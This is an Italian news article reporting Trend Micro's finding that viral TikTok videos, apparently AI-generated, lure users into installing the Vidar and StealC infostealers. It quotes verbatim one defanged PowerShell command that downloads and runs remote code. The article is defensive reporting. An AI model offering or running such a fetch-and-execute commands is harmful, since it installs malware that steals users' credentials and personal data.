Non guardate questi video virali su TikTok: insegnano a scaricare virus

Trend Micro rivela l'uso di TikTok per diffondere malware come Vidar e StealC, sfruttando video con istruzioni dannose. Ecco come difendersi.
Non guardate questi video virali su TikTok: insegnano a scaricare virus
Trend Micro rivela l'uso di TikTok per diffondere malware come Vidar e StealC, sfruttando video con istruzioni dannose. Ecco come difendersi.
Blazemedia
Pubblicato il 26 mag 2025

La piattaforma di TikTok è al centro di una nuova allerta di sicurezza informatica: un sofisticato attacco di malware sta sfruttando la popolarità del social per diffondere codici dannosi. Secondo un rapporto di Trend Micro, i cybercriminali hanno esposto oltre 500.000 utenti a video che invitano ad eseguire comandi nascosti, che causano il furto di dati personali.

Questa minaccia rappresenta un ulteriore sviluppo nel panorama della cybersecurity, evidenziando l’evoluzione delle tattiche di attacco. Gli hacker stanno utilizzando varianti di Vidar e StealC, due potenti strumenti di tipo infostealer, per sottrarre informazioni sensibili come credenziali bancarie e dati personali. La peculiarità di questo attacco risiede nell’uso di video generati tramite intelligenza artificiale, che mascherano comandi tecnici apparentemente innocui.

Come funziona l’attacco

Il meccanismo dell’attacco è semplice ma devastante: i video spingono gli utenti a eseguire comandi PowerShell sui propri dispositivi. Un esempio di comando utilizzato è:

iex (irm hxxps://allaivo[.]me/spotify)

Quando eseguito, questo comando scarica ed esegue codice malevolo progettato per eludere le protezioni, inclusi i sistemi di difesa come Windows Defender. Il risultato è un accesso non autorizzato ai dati sensibili dell’utente, con un impatto potenzialmente devastante.

La viralità come arma

La scelta di TikTok come vettore di attacco non è casuale. L’algoritmo della piattaforma amplifica rapidamente i contenuti, garantendo un’enorme esposizione in tempi ridotti. Gli esperti di Trend Micro hanno identificato un singolo video che ha raggiunto oltre mezzo milione di visualizzazioni, dimostrando quanto sia efficace questa strategia.

Questo metodo di attacco rappresenta una sfida significativa per i sistemi di protezione tradizionali. I comandi PowerShell utilizzati sono difficili da distinguere da istruzioni legittime, rendendo la minaccia particolarmente insidiosa per gli utenti meno esperti.

Impatto e contromisure

Gli strumenti infostealer come Vidar e StealC non si limitano al furto di informazioni personali, ma possono compromettere interi sistemi aziendali. Questo tipo di attacco può causare violazioni di dati su larga scala, con conseguenti danni economici e reputazionali significativi per le organizzazioni colpite.

Per affrontare questa minaccia, gli esperti sottolineano l’importanza di aggiornare le strategie difensive. Le tradizionali misure di sicurezza risultano inadeguate contro attacchi che sfruttano tecniche di social engineering e piattaforme come TikTok. È essenziale educare gli utenti a non eseguire comandi di origine sconosciuta, indipendentemente dalla piattaforma da cui provengono.

Ti consigliamo anche

Nuova truffa sui social media: apri un conto corrente e rischi il carcere
Web e Social

Nuova truffa sui social media: apri un conto corrente e rischi il carcere
WhatsApp Web sta per diventare ancora più comodo: la novità in arrivo
Web e Social

WhatsApp Web sta per diventare ancora più comodo: la novità in arrivo
L'ultima trovata: la truffa online del falso avviso Microsoft
Web e Social

L'ultima trovata: la truffa online del falso avviso Microsoft
WhatsApp introduce la chat vocale nei gruppi: scopri la funzione Parla Insieme
Web e Social

WhatsApp introduce la chat vocale nei gruppi: scopri la funzione Parla Insieme
Link copiato negli appunti